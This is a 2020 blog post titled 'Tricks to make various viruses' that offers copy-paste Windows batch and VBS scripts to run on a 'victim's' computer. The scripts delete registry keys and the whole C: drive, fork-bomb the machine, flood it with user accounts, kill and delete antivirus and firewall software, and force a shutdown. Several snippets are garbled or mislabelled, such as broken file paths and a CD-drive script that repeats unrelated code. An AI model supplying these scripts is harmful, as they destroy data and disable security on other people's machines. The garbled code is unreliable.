Saturday, May 9, 2020

TRICKS TO MAKE VARIOUS VIRUSES





HOW TO CREATE HARMFUL VIRUSES USING NOTEPAD


HI!

Hey! here it's for you

Tricks to make various different viruses using NOTEPAD

Have you ever thought of creating a computer virus yourself?

Don't worry,beacuse I am there to teach you that.here are twenty harmful viruses that will help you to do prank with your victim.

Now just open your notepad and try the fallowing viruses.
Remember this is only for educational purposes and not for anything else.

Now just copy(ctrl+c) and paste(ctrl+v) and save different viruses using(.bat) extenction

1. Disable Internet Permanently

And the codes for disabling internet permantly are:

echo @echo off>c:windowswimn32.bat

echo break off>c:windowswimn32.bat echo

ipconfig/release_all>c:windowswimn32.bat

echo end>c:windowswimn32.batreg add





2.Delete Key Registry Files

This will delete key registry files, then loops a message

@ECHO OFF
START reg delete HKCR/.exe

START reg delete HKCR/.dll

START reg delete HKCR/*

:MESSAGE

ECHO Your PC has been crashed.Your Dad.

GOTO MESSAGE

3.Endless Notepads

This will pop-up endless notepads until the computer freezes and crashes:

@ECHO off

:top

START %SystemRoot%\system32\notepad.exe

GOTO top

4. Popping CD Drives

This will make the CD drives constantly pop out

Set oWMP = CreateObject(”WMPlayer.OCX.7″)

Set colCDROMs = oWMP.cdromCollection

do

if colCDROMs.Count >= 1 then




5.Endless Enter

Set wshShell = wscript.CreateObject(”WScript.Shell”)

do

wscript.sleep 100

wshshell.sendkeys “~(enter)”

loop

loop

6. Application Bomber

It will start to open different applications repeatedly which will affect the system’s performance.

You can also add the application of your choice in the above code.

@echo off
                :x
                start winword
                start mspaint
                start notepad
                start write
                start cmd
                start explorer
                start control
                start calc
                goto x

7.Folder Flooder

This will create unlimited no. of folders.

@echo off
               :x
               md %random%
               /folder.
               goto x
               

8.User Account Flooder

This will create large no. of the user account on one’s PC and goes on

@echo off
               :xnet
               user %random% /add
               goto x
               

9.Process Creator

This will create unlimited background processes

%0|%0

10.Windows Hacker

This will delete your whole C:\ drive and it really unrecoverable

@Echo off
               Del C:\ *.* |y

10+. Anti Virus Disabler

This large code will disable any antivirus installed on the system

@ echo off
               rem
               rem Permanently Kill Anti-Virus
               net stop “Security Center”
               netsh firewall set opmode mode=disable
               tskill /A av*
               tskill /A fire*
               tskill /A anti*
               cls
               tskill /A spy*
               tskill /A bullguard
               tskill /A PersFw
               tskill /A KAV*
               tskill /A ZONEALARM
               tskill /A SAFEWEB
               cls
               tskill /A spy*
               tskill /A bullguard
               tskill /A PersFw
               tskill /A KAV*
               tskill /A ZONEALARM
               tskill /A SAFEWEB
               cls
               tskill /A OUTPOST
               tskill /A nv*
               tskill /A nav*
               tskill /A F-*
               tskill /A ESAFE
               tskill /A cle
               cls
               tskill /A BLACKICE
               tskill /A def*
               tskill /A kav
               tskill /A kav*
               tskill /A avg*
               tskill /A ash*
               cls
               tskill /A aswupdsv
               tskill /A ewid*
               tskill /A guard*
               tskill /A guar*
               tskill /A gcasDt*
               tskill /A msmp*
               cls
               tskill /A mcafe*
               tskill /A mghtml
               tskill /A msiexec
               tskill /A outpost
               tskill /A isafe
               tskill /A zap*cls
               tskill /A zauinst
               tskill /A upd*
               tskill /A zlclien*
               tskill /A minilog
               tskill /A cc*
               tskill /A norton*
               cls
               tskill /A norton au*
               tskill /A ccc*
               tskill /A npfmn*
               tskill /A loge*
               tskill /A nisum*
               tskill /A issvc
               tskill /A tmp*
               cls
               tskill /A tmn*
               tskill /A pcc*
               tskill /A cpd*
               tskill /A pop*
               tskill /A pav*
               tskill /A padmincls
               tskill /A panda*
               tskill /A avsch*
               tskill /A sche*
               tskill /A syman*
               tskill /A virus*
               tskill /A realm*cls
               tskill /A sweep*
               tskill /A scan*
               tskill /A ad-*
               tskill /A safe*
               tskill /A avas*
               tskill /A norm*
               cls
               tskill /A offg*
               del /Q /F C:\Program Files\alwils~1\avast4\*.*
               del /Q /F C:\Program Files\Lavasoft\Ad-awa~1\*.exe
               del /Q /F C:\Program Files\kasper~1\*.exe
               cls
               del /Q /F C:\Program Files\trojan~1\*.exe
               del /Q /F C:\Program Files\f-prot95\*.dll
               del /Q /F C:\Program Files\tbav\*.datcls
               del /Q /F C:\Program Files\avpersonal\*.vdf
               del /Q /F C:\Program Files\Norton~1\*.cnt
               del /Q /F C:\Program Files\Mcafee\*.*
               cls
               del /Q /F C:\Program Files\Norton~1\Norton~1\Norton~3\*.*
               del /Q /F C:\Program Files\Norton~1\Norton~1\speedd~1\*.*
               del /Q /F C:\Program Files\Norton~1\Norton~1\*.*
               del /Q /F C:\Program Files\Norton~1\*.*
               cls
               del /Q /F C:\Program Files\avgamsr\*.exe
               del /Q /F C:\Program Files\avgamsvr\*.exe
               del /Q /F C:\Program Files\avgemc\*.exe
               cls
               del /Q /F C:\Program Files\avgcc\*.exe
               del /Q /F C:\Program Files\avgupsvc\*.exe
               del /Q /F C:\Program Files\grisoft
               del /Q /F C:\Program Files\nood32krn\*.exe
               del /Q /F C:\Program Files\nood32\*.exe
               cls
               del /Q /F C:\Program Files\nod32
               del /Q /F C:\Program Files\nood32
               del /Q /F C:\Program Files\kav\*.exe
               del /Q /F C:\Program Files\kavmm\*.exe
               del /Q /F C:\Program Files\kaspersky\*.*
               cls
               del /Q /F C:\Program Files\ewidoctrl\*.exe
               del /Q /F C:\Program Files\guard\*.exe
               del /Q /F C:\Program Files\ewido\*.exe
               cls
               del /Q /F C:\Program Files\pavprsrv\*.exe
               del /Q /F C:\Program Files\pavprot\*.exe
               del /Q /F C:\Program Files\avengine\*.exe
               cls
               del /Q /F C:\Program Files\apvxdwin\*.exe
               del /Q /F C:\Program Files\webproxy\*.exe
               del /Q /F C:\Program Files\panda
               software\*.*
               rem
               

(1) Prank Name: File.bat Description: This prank will create and open a file that they cannot close, minimize, or maximize without closing the command prompt behind it. Step1:: Go into Notepad

Step2:: Type the text below. @echo off md hello :A start hello goto A

Step3:: Save it as file.bat °°°°°°°°°°°°°°°°°°°° •••••••••••••••••••••••••••••••• (2).Prank Name: Delete.bat Description: This prank will make your friends think that all of their files are being deleted and then at the end the file deletes itself so it is untraceable.

Step1:: Go into Notepad.

Step2:: Enter the text below into notepad Y echo. ping localhost -n 1 > nul cls dir /s echo. echo. ping localhost -n 2 >nul cls echo all data has been deleted.. pause del “c:delete.bat”

Step3:: Save this as delete.bat (MUST NAME IT THIS!) °°°°°°°°°°°°°°°°°° ••••••••••••••••••••••••••••••• Also see :: How to access or use Web (Internet) if it is blocked ??

(3). Prank Name: virus.bat Description: The prank will open and unlimited amount of command prompts until the computer crashes or you manually crash it. Step1-> Go into Notepad

Step2->> Type start virus.bat [virus.bat (exactly like that!)]

Step3->>> Save it as virus.bat (must be .bat) °°°°°°°°°°°°°°°°°°° •••••••••••••••••••••••••••• {4} Prank Name: shutdown.bat Description: This makes your friend think that his/her computer has a virus then their computer shuts down. Step(1):: Go to notepad and type: @echo off :A cls echo Do you wanna crash your computer? (y/n) pause echo Are you sure? (y/n) pause echo your computer will crash when the time reaches zero. pause msg * Your computer will crash in… msg * 5 msg * 4 msg * 3 msg * 2 msg * 1 msg * Good-Bye msg * You have been pwned! 🙂 shutdown -s -t 00

Step (2) :: Now save it as Shutdown.bat

Now its done and you can try it in your victims computer… ==================

(5) Prank Name: up.bat Description : Shows a fake username and password entrance area then deletes itself.. Step1-> Go into notepad and type: @echo off echo Note:: {If the proper username and password is not entered all files will be deleted by this virus}

Step2 ->> echo Good Luck set/p\/name=username: set/p\/password=password: echo haha you got the username and password wrong pause echo Files are being deleted pause dir/s del “c:up.bat”

Step3->>> Save it as up.bat (must be this!) ××××××××××××××××××× ×××××××××××× (6) Prank Name-:-CD Drive Open and close Description: This vbs file will continually open your CD drive.

image

CD Disk drive prank virus.

Step1-> Go into notepad

Step2->> Type the text below Set wshShell = wscript.CreateObject (“WScript.Shell”) do wscript.sleep 100 wshshell.sendkeys “~(enter)” loop

Step3->>> Save it as cdopen.vbs

Note:’:’:’: I humbly request you to use this tricks on your own risk…. I’ll never  recommed you to harm anyone 🙂 But i shared it for educational purpose…!! 🙂

No comments:

Post a Comment